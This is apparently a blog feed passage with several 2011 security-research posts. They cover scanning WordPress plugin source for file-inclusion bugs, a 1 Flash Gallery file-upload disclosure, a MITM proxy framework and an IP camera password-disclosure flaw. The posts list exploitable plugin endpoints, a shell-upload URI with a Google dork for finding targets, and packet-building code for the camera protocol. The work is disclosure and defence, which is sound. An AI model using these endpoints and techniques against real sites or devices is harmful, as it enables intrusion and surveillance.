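# Same pattern as the egrep above: a PHP include/require whose path is
# built from a user-controlled superglobal.
PATTERN = re.compile(
    r"(include|require)(_once)?(\(|\s+)[^[;)]*\$_(REQUEST|GET|POST|COOKIE)",
    re.IGNORECASE,
)

def scan_trunks(repo_root):
    """Return (path, line_no, line) hits for PHP files under trunk/ dirs."""
    hits = []
    for dirpath, _dirs, files in os.walk(repo_root):
        # Only look inside trunk directories, which should hold the
        # latest code for each plugin.
        if "trunk" not in dirpath.split(os.sep):
            continue
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, errors="replace") as f:
                for lineno, line in enumerate(f, 1):
                    if PATTERN.search(line):
                        hits.append((path, lineno, line.strip()))
    return hits
```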
&lt;p&gt;Base is &lt;a class="reference external" href="http://host/wp-content/plugins/PLUGIN_NAME/"&gt;http://host/wp-content/plugins/PLUGIN_NAME/&lt;/a&gt; unless explicitly
stated.&lt;/p&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;Remote File Include - unauthenticated&lt;/div&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;----------------------------------------------------------&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;zingiri-web-shop = /fws/ajax/init.inc.php?wpabspath=RFI OR
/fwkfor/ajax/init.inc.php?wpabspath=RFI&lt;/li&gt;
&lt;li&gt;mini-mail-dashboard-widget = wp-mini-mail.php?abspath=RFI (requires
POSTing a file with ID wpmm-upload for this to work)&lt;/li&gt;
&lt;li&gt;mailz = /lists/config/config.php?wpabspath=RFI&lt;/li&gt;
&lt;li&gt;relocate-upload = relocate-upload.php?ru_folder=asdf&amp;amp;abspath=RFI&lt;/li&gt;
&lt;li&gt;disclosure-policy-plugin =
/functions/action.php?delete=asdf&amp;amp;blogUrl=asdf&amp;amp;abspath=RFI&lt;/li&gt;
&lt;li&gt;wordpress-console = /common.php POST=&amp;quot;root=RFI&amp;quot;&lt;/li&gt;
&lt;li&gt;livesig = /livesig-ajax-backend.php POST=&amp;quot;wp-root=RFI&amp;quot;&lt;/li&gt;
&lt;li&gt;annonces = /includes/lib/photo/uploadPhoto.php?abspath=RFI&lt;/li&gt;
&lt;li&gt;theme-tuner = /ajax/savetag.php POST=&amp;quot;tt-abspath=RFI&amp;quot;&lt;/li&gt;
&lt;li&gt;evarisk =
/include/lib/actionsCorrectives/activite/uploadPhotoApres.php?abspath=RFI&lt;/li&gt;
&lt;li&gt;light-post = /wp-light-post.php?abspath=RFI&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;Local File Include - unauthenticated&lt;/div&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;----------------------------------------------------------&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;news-and-events = &lt;a class="reference external" href="http://host/wordpress/?ktf=ne_LFIPATH%00"&gt;http://host/wordpress/?ktf=ne_LFIPATH%00&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;As an experiment, I also modified a nice static source analyzer called
&lt;a class="reference external" href="http://sourceforge.net/projects/rips-scanner/files/"&gt;RIPS&lt;/a&gt; to take command line arguments (&lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/ripscli.tar.bz2"&gt;grab here&lt;/a&gt;, if interested) and
print out some basic information on probable vulnerabilities, and then
ran it over the plugin repo. Unfortunately, the noise was still pretty
high (partly due to its lack of OO support), so I didn't find much
beyond the greps. However, it did turn up a few RFIs:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;thecartpress =
/checkout/CheckoutEditor.php?tcp_save_fields=true&amp;amp;tcp_class_name=asdf&amp;amp;tcp_class_path=RFI&lt;/li&gt;
&lt;li&gt;allwebmenus-wordpress-menu-plugin = actions.php POST=&amp;quot;abspath=RFI&amp;quot;&lt;/li&gt;
&lt;li&gt;wpeasystats = export.php?homep=RFI&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Finally, I searched for Uploadify usage and outdated timthumb.php
libraries. This turned up another 24 vulnerable plugins:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;user-avatar - /user-avatar-pic.php -&amp;gt; Only vulnerable if
register_globals is enabled&lt;/li&gt;
&lt;li&gt;onswipe - /framework/thumb/thumb.php&lt;/li&gt;
&lt;li&gt;islidex - /js/timthumb.php&lt;/li&gt;
&lt;li&gt;seo-image-galleries - /timthumb.php&lt;/li&gt;
&lt;li&gt;verve-meta-boxes - /tools/timthumb.php&lt;/li&gt;
&lt;li&gt;dd-simple-photo-gallery - /include/resize.php&lt;/li&gt;
&lt;li&gt;wp-marketplace - /libs/timthumb.php&lt;/li&gt;
&lt;li&gt;a-gallery - /timthumb.php&lt;/li&gt;
&lt;li&gt;auto-attachments - /thumb.php&lt;/li&gt;
&lt;li&gt;cac-featured-content - /timthumb.php&lt;/li&gt;
&lt;li&gt;category-grid-view-gallery - /includes/timthumb.php&lt;/li&gt;
&lt;li&gt;category-list-portfolio-page - /scripts/timthumb.php&lt;/li&gt;
&lt;li&gt;cms-pack - /timthumb.php&lt;/li&gt;
&lt;li&gt;dp-thumbnail - /timthumb/timthumb.php&lt;/li&gt;
&lt;li&gt;extend-wordpress - /helpers/timthumb/image.php&lt;/li&gt;
&lt;li&gt;kino-gallery - /timthumb.php&lt;/li&gt;
&lt;li&gt;lisl-last-image-slider - /timthumb.php&lt;/li&gt;
&lt;li&gt;mediarss-external-gallery - /timthumb.php&lt;/li&gt;
&lt;li&gt;really-easy-slider - /inc/thumb.php&lt;/li&gt;
&lt;li&gt;rekt-slideshow - /picsize.php&lt;/li&gt;
&lt;li&gt;rent-a-car - /libs/timthumb.php&lt;/li&gt;
&lt;li&gt;vk-gallery - /lib/timthumb.php&lt;/li&gt;
&lt;li&gt;gpress =
/gpress-admin/fieldtypes/styles_editor/scripts/uploadify.php?fileext=php
- exact same as 1 Flash Plugin vuln&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Obviously, it's not very hard to find a decent number of 0days just by
grepping around, which is mildly disconcerting. Honestly, I had so many
hits for these searches that I probably missed a good deal of them. But
what else, besides vulnerability discovery, can we do with all this
data?&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="fingerprint"&gt;
&lt;h2&gt;Fingerprint&lt;/h2&gt;
&lt;p&gt;As an attacker, it's always nice to be able to figure out exactly what
code is running on a given server. Of course, this isn't usually
possible, as it requires a large body of information that just isn't
there. However, it becomes much, much easier when you have access to the
wealth of information contained in an SVN repo.&lt;/p&gt;
&lt;p&gt;I feel that I should mention that &lt;a class="reference external" href="https://twitter.com/#!/ethicalhack3r"&gt;ethicalhack3r's&lt;/a&gt; awesome tool
&lt;a class="reference external" href="http://code.google.com/p/wpscan/"&gt;WPScan&lt;/a&gt; does some of this, but last I checked will only detect if the
top 2000 plugins are installed, and, as far as I know, won't give you a
version. This is not to fault his work, though, at all; as I said, doing
fine grained fingerprinting on every plugin would normally be difficult
to impossible in most circumstances, and his tool does a ton of stuff
that wpfinger doesn't.&lt;/p&gt;
&lt;p&gt;So what does the repo give us that we were missing before? Well, we of
course have a list of all the plugins, and it is then trivial to grab
all of their download stats from wordpress.org to sort them in order of
popularity. In addition, we have not only the current version of the
plugin in the trunks, but we also (if SVN is being used properly) have
tags for each of the major version changes. Simply by comparing these
and finding changed files that we can check for remotely
(added/removed/modified content files or added/removed php scripts), we
can build a very effective fingerprint for each version of the plugin.
Then, all we have to do is run a small number of checks once we find
that a plugin is installed to obtain, at the very least, the major
version of the plugin.&lt;/p&gt;
&lt;p&gt;My current implementation is not pretty, but it seems to work quite well
on the servers I tested with. My signatures are simply binary search
trees encoded using Python tuples (don't judge me, it was quick to do it
that way), which I regenerate whenever I update the SVN. &amp;nbsp;The initial
fingerprinting takes quite awhile, as it stupidly MD5s all of the
relevant files in the repos. This was before I knew that
&lt;a class="reference external" href="http://docs.python.org/library/filecmp.html"&gt;filecmp/dircmp&lt;/a&gt; existed, so that's probably going to be rewritten soon
enough.&lt;/p&gt;
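&lt;p&gt;To give a rough idea of what such a tuple-encoded signature tree might look like (the node layout, URLs, and hashes below are all made up for illustration; the real encoding is in the wpfinger source):&lt;/p&gt;

```python
# Assumed node layout: (url_to_check, expected_md5, subtree_if_match,
# subtree_if_mismatch). Leaves are version strings, or None for
# "couldn't narrow it down". All URLs and hashes here are placeholders.
SIGNATURE = (
    "readme.txt", "aaaa",
    ("screenshot-1.png", "bbbb", "2.0", "1.5"),
    ("style.css", "cccc", "1.0", None),
)

def resolve_version(tree, fetch_md5):
    """Walk the tuple-encoded decision tree. fetch_md5(url) should return
    the MD5 of the remote file, or None if the request 404s."""
    while isinstance(tree, tuple):
        url, expected, on_match, on_mismatch = tree
        tree = on_match if fetch_md5(url) == expected else on_mismatch
    return tree  # a version string, or None if undetermined
```

&lt;p&gt;Each comparison prunes half the remaining versions, which is why only a handful of requests are needed once a plugin is known to be present.&lt;/p&gt;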
&lt;p&gt;Once the signatures are created, the scans are quite fast, and very
effective. It normally only takes one to two requests to detect plugin
presence, and only takes two or three more in most cases to detect the
version. It also tries to deal with things like error pages that return
200 by using difflib to compare the error page to the returned page,
although there are probably still some issues with that.&lt;/p&gt;
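&lt;p&gt;That difflib check boils down to something like the following (the similarity threshold is an assumed tuning value, not necessarily what wpfinger uses):&lt;/p&gt;

```python
import difflib

def looks_like_error_page(body, error_page, threshold=0.9):
    """Heuristic soft-404 detection: a 200 response whose body is nearly
    identical to a known error page probably is one. The threshold is an
    assumed tuning knob, not a value from the post."""
    ratio = difflib.SequenceMatcher(None, error_page, body).ratio()
    return ratio >= threshold
```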
&lt;p&gt;As I mentioned earlier, you can check the &lt;a class="reference external" href="http://code.google.com/p/wpfinger/source/checkout"&gt;latest versions&lt;/a&gt; over on
Google Code from now on. Here's a screenshot of a scan against one of my
test servers:&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2011/09/wpfinger1.png"&gt;&lt;img alt="wpfinger in action" src="https://spareclockcycles.org/wp-content/uploads/2011/09/wpfinger1.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Now that I've outlined more than enough ways to aid exploitation, let's
talk briefly about what can be done to help prevent some of these
attacks.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="defend"&gt;
&lt;h2&gt;Defend&lt;/h2&gt;
&lt;p&gt;For the Wordpress developers, the best defense would probably be to scan
any commits for known vulnerabilities, and either warn or (preferably)
block the developers from adding exploitable code to the repository.
This can be done quite easily using pre-commit hooks for SVN, which
allow for custom verification of commits to a repository. I'm planning
on releasing an example script when I get time that will detect commits
introducing the vulnerabilities I scanned for, but the more interesting
problem is how to gather a larger, better collection of signatures. I've
got a couple vague ideas for how to go about doing this, but would love
suggestions on the subject.&lt;/p&gt;
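&lt;p&gt;As a rough sketch of what such a hook might look like, using only the dynamic-include pattern from the grep section as its signature (svnlook receives the repository path and transaction ID per SVN's standard hook interface):&lt;/p&gt;

```python
# Sketch of an SVN pre-commit hook that rejects commits adding or
# updating PHP files containing includes built from request superglobals.
import re
import subprocess
import sys

BAD_INCLUDE = re.compile(
    r"(include|require)(_once)?(\(|\s+)[^[;)]*\$_(REQUEST|GET|POST|COOKIE)",
    re.IGNORECASE,
)

def is_vulnerable(source):
    """Return True if the PHP source contains a user-controlled include."""
    return bool(BAD_INCLUDE.search(source))

def main(repos, txn):
    # 'svnlook changed -t TXN REPOS' lists one "A   path" / "U   path"
    # line per changed item in the pending transaction.
    changed = subprocess.check_output(
        ["svnlook", "changed", "-t", txn, repos]).decode()
    for line in changed.splitlines():
        action, path = line[0], line[4:].strip()
        if action in "AU" and path.endswith(".php"):
            src = subprocess.check_output(
                ["svnlook", "cat", "-t", txn, repos, path]
            ).decode(errors="replace")
            if is_vulnerable(src):
                sys.stderr.write(
                    "Rejected: %s contains a dynamic include\n" % path)
                return 1
    return 0

# In the actual hook script you would end with:
#     sys.exit(main(sys.argv[1], sys.argv[2]))
```

&lt;p&gt;A real version would of course need a far larger signature set; this one only catches the single class of bug greppped for above.&lt;/p&gt;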
&lt;p&gt;As for what site admins can do, it's pretty clear: don't install plugins
or themes unless you *absolutely* need them, or unless you are both
willing and able to audit what you're installing. Having the latest
version does not necessarily make you safe, and if you forget to update,
it's quite easy for an attacker to detect and exploit that. In addition
to limiting your number of installed plugins, it might be possible to
parse the signatures I provide and use a WAF to return tainted results
when those URLs are requested too closely together. I haven't personally
done it, but I'm sure it wouldn't be too extraordinarily
difficult.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="conclusion"&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;The methods presented here are not unique to Wordpress; I'm fairly
confident they could easily be applied to any open source CMS. I largely
chose Wordpress because I was already working with it when I stumbled
into this, and it had a really nice repository to pull from. Please feel
free to try this out in other places, and let me know how it goes.&lt;/p&gt;
&lt;p&gt;P.S.: I'd like to thank &lt;a class="reference external" href="http://dustybit.com"&gt;duststorm&lt;/a&gt; for lending me a server to seed the
repos with. Much appreciated.&lt;/p&gt;
&lt;/div&gt;
</summary><category term="lfi"></category><category term="rfi"></category><category term="scanning"></category><category term="sqli"></category><category term="subversion"></category><category term="svn"></category><category term="vulnerabilities"></category><category term="wordpress"></category></entry><entry><title>1 Flash Gallery: Arbitrary File Upload</title><link href="https://spareclockcycles.org/2011/09/06/flash-gallery-arbitrary-file-upload.html" rel="alternate"></link><updated>2011-09-06T19:40:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2011-09-06:2011/09/06/flash-gallery-arbitrary-file-upload.html</id><summary type="html">&lt;p&gt;This is a short post documenting the vulnerability I&amp;nbsp;inadvertently&amp;nbsp;found
yesterday in the &lt;a class="reference external" href="http://wordpress.org/extend/plugins/1-flash-gallery/"&gt;1 Flash Gallery plugin&lt;/a&gt;, which has since been
patched. This plugin has been downloaded an estimated 460,000 times, and
as of yesterday was ranked by Wordpress as the 17th most popular plugin
(although I'm not entirely sure how this judgement is made). A patch has
been released, so anyone who has this plugin installed should update
immediately. I'll probably do a follow-up in the near future on
Wordpress plugins in general, but for now, just the facts.&lt;/p&gt;
&lt;div class="section" id="vulnerability"&gt;
&lt;h2&gt;Vulnerability&lt;/h2&gt;
&lt;p&gt;The 1 Flash Gallery Wordpress plugin contains an arbitrary file
upload vulnerability, present from version 1.30 through version
1.5.7.&lt;/p&gt;
&lt;p&gt;It is possible to plant a remote shell and thereby execute arbitrary
code on the remote host by simply submitting a PHP file via POST request
to the following URI on a vulnerable installation:&lt;/p&gt;
&lt;p&gt;&lt;tt class="docutils literal"&gt;&lt;span class="pre"&gt;/wp-content/plugins/1-flash-gallery/upload.php?action=uploadify&amp;amp;fileext=php&lt;/span&gt;&lt;/tt&gt;&lt;/p&gt;
&lt;p&gt;This works because the upload.php script a.) performs no authentication
checks, b.) trusts a user-supplied request variable to provide allowed
filetypes, and c.) does not actually validate that the file is a
well-formed image file. I have only tested the vulnerability on an
installation that does not perform watermarking, the default setting; it
may or may not work on installations that do otherwise.&lt;/p&gt;
&lt;p&gt;I have created a proof-of-concept Metasploit module demonstrating the
vulnerability, which interested persons can download here:
&lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/fgallery_file_upload.rb"&gt;https://spareclockcycles.org/downloads/code/fgallery_file_upload.rb&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Hosts can be found with the following Google
search:&amp;nbsp;inurl:&amp;quot;wp-content/plugins/1-flash-gallery&amp;quot;&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="disclosure"&gt;
&lt;h2&gt;Disclosure&lt;/h2&gt;
&lt;p&gt;I reported the vulnerability to both Wordpress and the plugin developers
yesterday, Sep 5 2011. Both responded quickly to the issue, and took
appropriate measures. Wordpress temporarily took down the plugin until
the patch was released, which the developers did later in the day. I'd
like to thank Wordpress for their fast and professional response.&lt;/p&gt;
&lt;p&gt;I am now releasing details of the vulnerability publicly to ensure that
users are aware of the issue, and encourage them to update their plugins
accordingly. The 1 Flash Gallery developers did not stress the severe
implications of this vulnerability in &lt;a class="reference external" href="http://wordpress.org/extend/plugins/1-flash-gallery/changelog/"&gt;their changelog&lt;/a&gt; (or mention
that it was a security issue at all), so this post is partly to ensure
that the implications are made clear. Personally, I would uninstall the
plugin, given its &lt;a class="reference external" href="http://secunia.com/advisories/43640"&gt;history of serious security issues&lt;/a&gt;&amp;nbsp;and the
developers' lack of candor about those reported to them.&lt;/p&gt;
&lt;p&gt;As always, any comments are welcome.&lt;/p&gt;
&lt;/div&gt;
</summary><category term="arbitrary file upload"></category><category term="metasploit"></category><category term="vulnerability"></category><category term="websec"></category></entry><entry><title>Sergio Proxy v0.2 Released</title><link href="https://spareclockcycles.org/2011/07/10/sergio-proxy-v0-2-released.html" rel="alternate"></link><updated>2011-07-10T18:06:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2011-07-10:2011/07/10/sergio-proxy-v0-2-released.html</id><summary type="html">&lt;div class="section" id="updates-in-this-release"&gt;
&lt;h2&gt;Updates in this Release&lt;/h2&gt;
&lt;p&gt;So after a ridiculously long period of procrastination, I finally got
around to updating Sergio Proxy to make it remotely usable. I was never
very happy with how the initial code turned out, but given that it was
hacked out in a couple days just to test some ideas, I suppose that
shouldn't be surprising. My original hope for it was to provide a very
easy to extend plugin interface that allowed Python programmers to
easily modify requests and responses during a MITM attack on HTTP.
&amp;nbsp;While you could extend it without too much trouble, it was far from
perfect, and passing options to the thing was an atrocious mess. Worse,
my hooks into Twisted weren't the most stable or fast, rendering it not
very useful.&lt;/p&gt;
&lt;p&gt;I believe I've solved some of these issues in this release, although you
can certainly judge for yourself. I've made three major changes: first,
rather than using my own transparent proxy classes for interacting with
Twisted, I've instead started using &lt;a class="reference external" href="http://www.thoughtcrime.org/software/sslstrip/"&gt;Moxie Marlinspike's sslstrip&lt;/a&gt; to
provide the proxy functionality. Although I didn't know it when I first
started Sergio Proxy, sslstrip uses almost exactly the same method for
creating the transparent proxy: extending the Twisted framework's HTTP
proxy classes. Rather than duplicate effort to create something that
would still be miles behind, I instead decided to focus on providing a
convenient plugin interface that could hook sslstrip at various points
during operation. This brings me to the second change: a new plugin
interface that should make it ridiculously simple to extend Sergio
Proxy. I've currently implemented three modules (SMBAuth, ArpSpoof, and
Upsidedownternet), but really there are tons of other things that could
be done. Finally, I completely revamped the logging and options code,
which were virtually non-existent in my first release. Combined, these
should make Sergio Proxy a nice framework for making use of HTTP MITM
attacks. You can grab the new code
here:&amp;nbsp;&lt;a class="reference external" href="https://code.google.com/p/sergio-proxy/downloads/list"&gt;https://code.google.com/p/sergio-proxy/downloads/list&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&amp;nbsp;Edit:&lt;/strong&gt;&amp;nbsp;I've also added a simple BrowserPwn plugin now, grab the
current trunk to get
it:&amp;nbsp;&lt;a class="reference external" href="https://code.google.com/p/sergio-proxy/source/checkout"&gt;https://code.google.com/p/sergio-proxy/source/checkout&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="using-and-abusing-sergio-proxy"&gt;
&lt;h2&gt;Using and Abusing Sergio Proxy&lt;/h2&gt;
&lt;p&gt;So enough about the changes: how would one go about using it? Well, if
all you want to do is trigger an SMB authentication attempt or launch the
Upsidedownternet, just run sergio-proxy.py -h and choose your desired
options. ArpSpoof will set up the MITM if you so desire (requires
ettercap or arpspoof), and sslstrip will record what it normally does.
If you want to do something else, though, you'll need to create a new
plugin. Don't worry, it's quite simple!&lt;/p&gt;
&lt;p&gt;First, you need to do a few simple things. The bundled plugins provide
good examples, but I will step through the required steps just in case.
All plugins inherit from the Plugin class in plugins/plugin.py, and
Sergio Proxy needs to know the subclass relationship, so you must do a
&amp;quot;from plugins.plugin import Plugin&amp;quot; in every plugin file. No exceptions.
Then, you need to define some class attributes to tell Sergio Proxy
about your plugin. These are as follows: name (human friendly name),
optname (option name to enable plugin), has_opts (needs to add opts to
argparse object), and implements (a list of hooks it implements). If you
require arguments, you need to implement the add_options function. It
takes an &lt;a class="reference external" href="http://docs.python.org/dev/library/argparse.html#argparse.ArgumentParser"&gt;argparse Parser object&lt;/a&gt;&amp;nbsp;as its only argument, where you can
then do with it as you please. Be warned, though: if your arguments
conflict with others, you may have issues.&lt;/p&gt;
&lt;p&gt;Now, you are ready to implement the actual functionality of your plugin.
There are 5 functions that really matter, and you can see them in the
base Plugin class: initialize, handleHeader, connectionMade,
handleResponse, and finish. initialize is passed the namespace that
argparse parsed, and is called whenever your plugin has been enabled by
a command line switch and is going to be run. You should do any setup
you require here rather than in __init__, as you won't have options in
__init__ and it is entirely possible your module won't be run after
that point. finish, likewise, is called on shutdown.&lt;/p&gt;
&lt;p&gt;There are three points where Sergio Proxy hooks sslstrip by default
right now: on connecting to the server prior to sending the victim's
request, on receiving any header from the server, and prior to sending a
response to the client. These correspond to the other three hook functions
I mentioned. It is quite simple to add more if necessary, but that's
outside the scope of this post. Whenever sslstrip hits any of these
three points during execution, Sergio Proxy checks to see if any plugin
wants to hook that function and, if so, calls the function with
arguments that were provided to the function call in sslstrip.
Generally, &amp;nbsp;if you have changes you want to send back to sslstrip, you
should modify the request object, and not return anything. However, in
the handleResponse hook this is not possible (as the local var data is
used rather than an object attribute), and you must return a dictionary
containing the modified arguments. This is currently the only case where
this is necessary, but it's important to note.&lt;/p&gt;
&lt;p&gt;Now, all you need to do is override these functions to do what you want.
If you're wondering what information you have access to through the
request object, it may be useful to either a.) hook the function you
want and print out information about it at that time or b.) look through
sslstrip and the Twisted proxy documentation. Also, the plugins I
provided show some of the basic things you might want to do.&lt;/p&gt;
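&lt;p&gt;Putting all of the above together, a minimal (hypothetical) plugin might look something like this; any names beyond what's described above are assumptions, so check the bundled plugins for the real signatures:&lt;/p&gt;

```python
# Hypothetical plugin sketch. In a real plugin the import below is
# mandatory, as noted earlier; the stub fallback just keeps this example
# self-contained and runnable outside the Sergio Proxy tree.
try:
    from plugins.plugin import Plugin
except ImportError:
    class Plugin(object):
        pass

class ResponseTagger(Plugin):
    # Class attributes Sergio Proxy reads when registering the plugin:
    name = "Response Tagger"         # human-friendly name
    optname = "tagger"               # command line switch that enables it
    has_opts = True                  # we want to add argparse options
    implements = ["handleResponse"]  # hooks this plugin provides

    def add_options(self, parser):
        # Only called because has_opts is True; the option name is made up.
        parser.add_argument("--tag", default="x-tagged")

    def initialize(self, options):
        # Receives the parsed argparse namespace; do setup here, not in
        # __init__, since options aren't available there.
        self.tag = options.tag

    def handleResponse(self, request, data):
        # Per the post, handleResponse must return a dict of the modified
        # arguments rather than mutating in place; the exact parameter
        # names here are an assumption.
        return {"request": request, "data": data + self.tag}
```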
&lt;p&gt;Hopefully you all find the new changes useful. If you end up writing a
plugin, please feel free to submit it! If it was useful to you, it is
likely it will be useful to others as well. Happy hacking!&lt;/p&gt;
&lt;/div&gt;
</summary><category term="http"></category><category term="mitm"></category><category term="sergio proxy"></category><category term="twisted"></category></entry><entry><title>Exploiting an IP Camera Control Protocol</title><link href="https://spareclockcycles.org/2011/05/23/exploiting-an-ip-camera-control-protocol.html" rel="alternate"></link><updated>2011-05-23T16:43:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2011-05-23:2011/05/23/exploiting-an-ip-camera-control-protocol.html</id><summary type="html">&lt;p&gt;When I first started on this post, I intended to write about some fun
things one can do with a $30 Rosewill IP camera (&lt;a class="reference external" href="http://www.rosewill.com/products/1728/productDetail.htm"&gt;RXS-3211&lt;/a&gt;). While I
still intend to do this in the near future, I decided instead to
document an interesting password disclosure vulnerability I found that
appears to affect at least 150 different IP-based surveillance cameras.
This vulnerability allows a remote, unauthenticated attacker to read
and/or change the administrator password on affected devices by sending
a single UDP packet. This gives an attacker full control over the
device, including access to the video streams.&amp;nbsp;Relatedly, a passive
attacker on the local network can retrieve the current password without
a MITM attack if the device is currently being administered.&lt;/p&gt;
&lt;p&gt;Before I start, though, I would like to clarify: I have only tested this
attack against the RXS-3211, as it is the only one I own / can afford.
That said, I believe that it is a problem with the management protocol
rather than just the device itself. It is possible that the problem is
limited just to the RXS, but I have tested the Windows admin interfaces
of other cameras with similar results. Doing this actually helped me
improve the attack, so it seems likely that it will work elsewhere.
Regardless, I would definitely love to hear from anyone who has a
possibly affected device and get feedback / pcap dumps.&lt;/p&gt;
&lt;p&gt;The list of affected devices, pulled using strings from the Rosewill
admin executable, can be &lt;a class="reference external" href="https://spareclockcycles.org/downloads/ipcam_pass_disclosure_devices.txt"&gt;grabbed here&lt;/a&gt;. It includes devices from
Edimax, Hawking, Rosewill, Intellinet, Nilox, Zonet, and 2Direct, among
others. Many of these appear to be rebrands, but I can't really know
without devices to look at. This list does not include the large number
of &amp;quot;UnKnown&amp;quot; entries that could also be affected.&lt;/p&gt;
&lt;div class="section" id="why-i-can-t-have-nice-things-i-break-them"&gt;
&lt;h2&gt;Why I Can't Have Nice Things (I Break Them)&lt;/h2&gt;
&lt;p&gt;I bought the previously mentioned camera this week as a cheap way to
monitor my apartment. Not content simply to set the thing up and leave
it be, I first wanted to kick the metaphorical tires a bit. It turned
out to be running an embedded version of Linux, and had TCP ports 80
(HTTP), 554 (RTSP), and 4321-2 (proprietary viewing protocol) open. At
this point, I became curious to see if I could run my own code on the
thing (which could make it quite useful), so I started poking around for
vulnerabilities that might allow for that.&lt;/p&gt;
&lt;p&gt;The web interface quite probably provides a number of ways to get a
shell, but I decided first to look at how the administrative control
application that was provided with it worked. Interestingly, as soon as
I opened the application, it had already detected my camera. I fired up
Wireshark, and it turned out that it was communicating to the device via
UDP broadcast messages to port 13364.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="how-not-to-design-a-protocol"&gt;
&lt;h2&gt;How Not To Design a Protocol&lt;/h2&gt;
&lt;p&gt;After some glancing over the traffic logs, it was pretty clear that this
control protocol was terrible. I could go on for awhile about the design
problems with it, but it would be rather off topic.&lt;/p&gt;
&lt;p&gt;The real problem I uncovered was how the protocol handles
authentication. It's a simple protocol, and consists of request packets
(sent by the admin software) and reply packets (sent by the device).
Depending on the request, the response is either sent broadcast or
unicast. The packets all follow the same format before diverging:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
6 bytes -&amp;gt; Concerned device (FF:FF:FF:FF:FF:FF for all, device MAC for specific)
1 byte  -&amp;gt; Request or response (0 or 1 respectively)
3 bytes -&amp;gt; Req/resp type (some unique ID that the software understands)
Rest    -&amp;gt; Req/resp specific payload (optional)
&lt;/pre&gt;
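&lt;p&gt;Building such a packet is a couple lines of struct packing; the helpers below are my own sketch, and the 3-byte type IDs are placeholders rather than the real codes:&lt;/p&gt;

```python
import socket
import struct

PORT = 13364  # UDP port the admin software and devices chatter on

def build_packet(mac, is_response, req_type, payload=b""):
    """Pack a message per the layout above: 6-byte target MAC,
    1-byte request/response flag, 3-byte type ID, then the payload."""
    assert len(mac) == 6 and len(req_type) == 3
    flag = struct.pack("B", 1 if is_response else 0)
    return mac + flag + req_type + payload

def broadcast(pkt):
    """Send a packet to every device on the local network segment."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    s.sendto(pkt, ("255.255.255.255", PORT))
    s.close()
```

&lt;p&gt;A broadcast probe would then be broadcast(build_packet(b"\xff" * 6, False, some_type_id)); the real type IDs can be pulled out of the PoC scripts linked later in the post, or out of your own Wireshark captures.&lt;/p&gt;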
&lt;p&gt;Each type of request/response seems to have a set size, and if you send
one of an unexpected size, the packet is ignored. From the large number
of null bytes in the packets, it seems that there are extra fields that
can be provided that I haven't explored yet. The one we care about,
however, is obvious: the password field. Yes, the password is sent (and
in some cases, broadcast) &lt;strong&gt;in clear text&lt;/strong&gt; following an unauthenticated
request from anywhere. The admin interface reads this password,
authenticates users &lt;strong&gt;client side&lt;/strong&gt;, and, if it passes, will allow the
user to send configuration requests. In addition to just being able to
steal the device password remotely, we can also change the password
&lt;strong&gt;and&lt;/strong&gt; do it with a spoofed UDP packet, hiding the source of the
attack.&lt;/p&gt;
&lt;p&gt;I ran into a bit of a problem with the Rosewill-provided management
interface, but it wasn't too difficult to overcome. It only supported
broadcast queries and settings, which made it impossible to read the
password remotely (i.e., outside the local network), and no response
would be given if one set the password, making scanning much more
difficult. However, I assumed they must have a way to get a unicast
response instead, as some other camera manuals advise users to forward
UDP port 13364 on their routers. Rather than trying the codes manually,
I downloaded a few different management interfaces until I found one
that supported remote cameras. I set it up to talk to mine, and voila,
unicast commands were mine.&lt;/p&gt;
&lt;p&gt;With these, it's trivial to read or change the password of the device.
This can be exploited remotely and, as mentioned, with a spoofed source
address for the set command (yay connectionless protocols). Having the
password then gives full administrative control over the device,
allowing an attacker to basically do anything, from simply watching the
camera feeds to exploiting the device further. If you have one of these
devices yourself, you can test with my proof-of-concept code:
&lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/rxs-3211-changepw.py"&gt;rxs-3211-changepw.py&lt;/a&gt; and &lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/rxs-3211-retrievepw.py"&gt;rxs-3211-retrievepw.py&lt;/a&gt; (both require
&lt;a class="reference external" href="http://www.secdev.org/projects/scapy/"&gt;Scapy&lt;/a&gt;) . I also went ahead and made a Metasploit module that will
scan a network for vulnerable hosts: &lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/rxs_3211_retrievepw.rb"&gt;rxs-32111-retrievepw.rb&lt;/a&gt; . If
it's in the list but is not the RXS-3211, then the packets that need to
be sent may be significantly different (probably &amp;nbsp;just the changepw
